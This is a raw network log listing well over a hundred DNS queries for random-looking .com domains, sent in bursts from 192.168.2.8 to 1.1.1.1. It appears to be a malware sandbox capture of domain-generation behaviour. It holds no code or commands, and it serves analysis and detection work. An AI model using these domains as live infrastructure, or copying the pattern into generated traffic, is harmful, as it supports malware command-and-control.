                                                                                                                                                                                                          Nov 11, 2024 18:24:42.615370035 CET192.168.2.81.1.1.10xc481Standard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.615580082 CET192.168.2.81.1.1.10xa6ffStandard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.615905046 CET192.168.2.81.1.1.10xf1d0Standard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.615931034 CET192.168.2.81.1.1.10x9192Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.618273973 CET192.168.2.81.1.1.10x6048Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.618457079 CET192.168.2.81.1.1.10xc6a3Standard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.618906975 CET192.168.2.81.1.1.10x626cStandard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.619856119 CET192.168.2.81.1.1.10x8847Standard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.619908094 CET192.168.2.81.1.1.10x680cStandard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.622823954 CET192.168.2.81.1.1.10x76caStandard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.633480072 CET192.168.2.81.1.1.10x515fStandard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.634042978 CET192.168.2.81.1.1.10xfe85Standard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.634229898 CET192.168.2.81.1.1.10xbbbeStandard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.634382963 CET192.168.2.81.1.1.10xfb63Standard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.635385990 CET192.168.2.81.1.1.10x529aStandard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.635750055 CET192.168.2.81.1.1.10x6ae6Standard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.636029005 CET192.168.2.81.1.1.10xfdfeStandard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.638153076 CET192.168.2.81.1.1.10x2a74Standard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.639739990 CET192.168.2.81.1.1.10xc34bStandard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.653188944 CET192.168.2.81.1.1.10x2278Standard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656071901 CET192.168.2.81.1.1.10x4cb9Standard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656250000 CET192.168.2.81.1.1.10xe23fStandard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656399012 CET192.168.2.81.1.1.10x823dStandard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656564951 CET192.168.2.81.1.1.10xfbdeStandard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656717062 CET192.168.2.81.1.1.10xb95Standard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656852961 CET192.168.2.81.1.1.10x571fStandard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656980991 CET192.168.2.81.1.1.10xc457Standard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.657118082 CET192.168.2.81.1.1.10x5aeStandard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.657239914 CET192.168.2.81.1.1.10xe9f9Standard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.658370018 CET192.168.2.81.1.1.10xc969Standard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.674122095 CET192.168.2.81.1.1.10xc267Standard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.031740904 CET192.168.2.81.1.1.10x6b93Standard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.045677900 CET192.168.2.81.1.1.10xbccdStandard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.047188044 CET192.168.2.81.1.1.10xb1f7Standard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.063196898 CET192.168.2.81.1.1.10xa47cStandard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.133205891 CET192.168.2.81.1.1.10xaf23Standard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.158827066 CET192.168.2.81.1.1.10x3087Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.296459913 CET192.168.2.81.1.1.10xc094Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.298794031 CET192.168.2.81.1.1.10x24bStandard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.298990965 CET192.168.2.81.1.1.10xdeb3Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.299664974 CET192.168.2.81.1.1.10x9d3bStandard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.300059080 CET192.168.2.81.1.1.10x4e70Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.300412893 CET192.168.2.81.1.1.10xfbd0Standard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.300710917 CET192.168.2.81.1.1.10xaa4bStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.301265955 CET192.168.2.81.1.1.10x8a28Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.301717043 CET192.168.2.81.1.1.10xe0cfStandard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.320455074 CET192.168.2.81.1.1.10xb668Standard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.321247101 CET192.168.2.81.1.1.10xfb1bStandard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.322180033 CET192.168.2.81.1.1.10x7e1fStandard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.323142052 CET192.168.2.81.1.1.10xfd35Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.325608015 CET192.168.2.81.1.1.10x8631Standard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.326273918 CET192.168.2.81.1.1.10x962dStandard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.327100039 CET192.168.2.81.1.1.10x2e56Standard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.327898026 CET192.168.2.81.1.1.10xea52Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.329479933 CET192.168.2.81.1.1.10xcb5dStandard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.330319881 CET192.168.2.81.1.1.10x958Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.331394911 CET192.168.2.81.1.1.10x2b9dStandard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.345808029 CET192.168.2.81.1.1.10x51d6Standard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.346039057 CET192.168.2.81.1.1.10x8e61Standard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.349245071 CET192.168.2.81.1.1.10xc2cbStandard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.358503103 CET192.168.2.81.1.1.10x4f01Standard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.359890938 CET192.168.2.81.1.1.10xe0ebStandard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.360090017 CET192.168.2.81.1.1.10x179aStandard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.360361099 CET192.168.2.81.1.1.10x87d0Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.360606909 CET192.168.2.81.1.1.10xd3f2Standard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.360871077 CET192.168.2.81.1.1.10x6db6Standard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.360905886 CET192.168.2.81.1.1.10x7abbStandard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.361479998 CET192.168.2.81.1.1.10x5e91Standard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.369472980 CET192.168.2.81.1.1.10x92e2Standard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.369641066 CET192.168.2.81.1.1.10x5db2Standard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.369798899 CET192.168.2.81.1.1.10xf230Standard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.370219946 CET192.168.2.81.1.1.10x176bStandard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.370455980 CET192.168.2.81.1.1.10x1749Standard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.370502949 CET192.168.2.81.1.1.10x3911Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.370642900 CET192.168.2.81.1.1.10x3be5Standard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.371402025 CET192.168.2.81.1.1.10x112dStandard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.371576071 CET192.168.2.81.1.1.10x944dStandard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.375849962 CET192.168.2.81.1.1.10x979eStandard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.376245975 CET192.168.2.81.1.1.10x5d7eStandard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.377041101 CET192.168.2.81.1.1.10x3c15Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.377204895 CET192.168.2.81.1.1.10xd216Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.377443075 CET192.168.2.81.1.1.10xd8e2Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.377599955 CET192.168.2.81.1.1.10x6844Standard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.378231049 CET192.168.2.81.1.1.10xd57cStandard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.378700018 CET192.168.2.81.1.1.10xafd3Standard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.378881931 CET192.168.2.81.1.1.10xcd79Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.576500893 CET192.168.2.81.1.1.10x785dStandard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.576630116 CET192.168.2.81.1.1.10x93ccStandard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.578979015 CET192.168.2.81.1.1.10xbcd0Standard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.582233906 CET192.168.2.81.1.1.10xa9dfStandard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.582525969 CET192.168.2.81.1.1.10x5d09Standard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.610343933 CET192.168.2.81.1.1.10x4346Standard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.617883921 CET192.168.2.81.1.1.10x9abeStandard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619075060 CET192.168.2.81.1.1.10x8febStandard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619330883 CET192.168.2.81.1.1.10xcfc5Standard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619528055 CET192.168.2.81.1.1.10x3f03Standard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619632006 CET192.168.2.81.1.1.10x2e7cStandard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619806051 CET192.168.2.81.1.1.10xf004Standard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619877100 CET192.168.2.81.1.1.10x996bStandard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619992971 CET192.168.2.81.1.1.10xba2cStandard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.620373011 CET192.168.2.81.1.1.10xe890Standard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.620579004 CET192.168.2.81.1.1.10x8f23Standard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.621052980 CET192.168.2.81.1.1.10xd07aStandard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.621243954 CET192.168.2.81.1.1.10x44d4Standard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625456095 CET192.168.2.81.1.1.10xa968Standard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625629902 CET192.168.2.81.1.1.10xcfa6Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625792027 CET192.168.2.81.1.1.10xe296Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625943899 CET192.168.2.81.1.1.10xbf67Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626089096 CET192.168.2.81.1.1.10x71a4Standard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626228094 CET192.168.2.81.1.1.10x8651Standard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626358986 CET192.168.2.81.1.1.10x9199Standard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626620054 CET192.168.2.81.1.1.10x3401Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.627151012 CET192.168.2.81.1.1.10xa173Standard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.627934933 CET192.168.2.81.1.1.10xbStandard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.631983042 CET192.168.2.81.1.1.10x584eStandard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.822108030 CET192.168.2.81.1.1.10x1f20Standard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.960943937 CET192.168.2.81.1.1.10xe494Standard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.962795973 CET192.168.2.81.1.1.10xcefaStandard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.963279963 CET192.168.2.81.1.1.10xef57Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.964711905 CET192.168.2.81.1.1.10x6568Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.966873884 CET192.168.2.81.1.1.10xf628Standard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.971338034 CET192.168.2.81.1.1.10xc4b7Standard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.974669933 CET192.168.2.81.1.1.10x3236Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.975748062 CET192.168.2.81.1.1.10x32aeStandard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.988967896 CET192.168.2.81.1.1.10xa026Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.994606018 CET192.168.2.81.1.1.10x3ef7Standard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.994749069 CET192.168.2.81.1.1.10xe110Standard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.995125055 CET192.168.2.81.1.1.10xda0Standard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.995157003 CET192.168.2.81.1.1.10x2a15Standard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.995582104 CET192.168.2.81.1.1.10xf0f3Standard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.015829086 CET192.168.2.81.1.1.10x4c6cStandard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.016064882 CET192.168.2.81.1.1.10xc6f9Standard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.023145914 CET192.168.2.81.1.1.10x5104Standard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.030179977 CET192.168.2.81.1.1.10xeb8bStandard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.048535109 CET192.168.2.81.1.1.10x39a4Standard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.048825979 CET192.168.2.81.1.1.10x1dd3Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.049009085 CET192.168.2.81.1.1.10x5f99Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.053539991 CET192.168.2.81.1.1.10x8a2bStandard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.053903103 CET192.168.2.81.1.1.10x2a88Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.054615021 CET192.168.2.81.1.1.10x5d7Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.056608915 CET192.168.2.81.1.1.10xe371Standard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.057251930 CET192.168.2.81.1.1.10x8e4dStandard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.059463024 CET192.168.2.81.1.1.10x80eeStandard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.061425924 CET192.168.2.81.1.1.10x8b29Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.061707020 CET192.168.2.81.1.1.10x4444Standard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.085669041 CET192.168.2.81.1.1.10xf9aaStandard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.086155891 CET192.168.2.81.1.1.10x87d3Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.086332083 CET192.168.2.81.1.1.10x66daStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.086509943 CET192.168.2.81.1.1.10x363aStandard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.087625980 CET192.168.2.81.1.1.10xa7c5Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.093360901 CET192.168.2.81.1.1.10x6045Standard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.107997894 CET192.168.2.81.1.1.10x3d37Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.109899044 CET192.168.2.81.1.1.10x7b0Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.120982885 CET192.168.2.81.1.1.10xf3a4Standard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.121155977 CET192.168.2.81.1.1.10x48eeStandard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.121305943 CET192.168.2.81.1.1.10xcc40Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.121462107 CET192.168.2.81.1.1.10x4094Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.122155905 CET192.168.2.81.1.1.10xc656Standard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.122370005 CET192.168.2.81.1.1.10xeb45Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.122549057 CET192.168.2.81.1.1.10x4ca9Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.122719049 CET192.168.2.81.1.1.10x8b86Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.122870922 CET192.168.2.81.1.1.10xf28cStandard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123016119 CET192.168.2.81.1.1.10x57b6Standard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123156071 CET192.168.2.81.1.1.10x198dStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123342037 CET192.168.2.81.1.1.10x3afStandard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123609066 CET192.168.2.81.1.1.10xcf4dStandard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123830080 CET192.168.2.81.1.1.10x90acStandard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123982906 CET192.168.2.81.1.1.10xbdd4Standard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.132989883 CET192.168.2.81.1.1.10xcff5Standard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.134162903 CET192.168.2.81.1.1.10xba06Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.134320021 CET192.168.2.81.1.1.10xd522Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.134474993 CET192.168.2.81.1.1.10xfcefStandard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.738578081 CET192.168.2.81.1.1.10x909fStandard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.739268064 CET192.168.2.81.1.1.10x2b51Standard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.739418983 CET192.168.2.81.1.1.10x11a0Standard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.739561081 CET192.168.2.81.1.1.10xfdf2Standard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.739837885 CET192.168.2.81.1.1.10xa365Standard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.739837885 CET192.168.2.81.1.1.10x4b73Standard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.740176916 CET192.168.2.81.1.1.10xb791Standard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.740241051 CET192.168.2.81.1.1.10x3fc2Standard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.740369081 CET192.168.2.81.1.1.10xbdfStandard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.740494967 CET192.168.2.81.1.1.10xd6f8Standard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.740686893 CET192.168.2.81.1.1.10x6906Standard query (0)qegyhip.comA (IP address)IN (0x0001)false
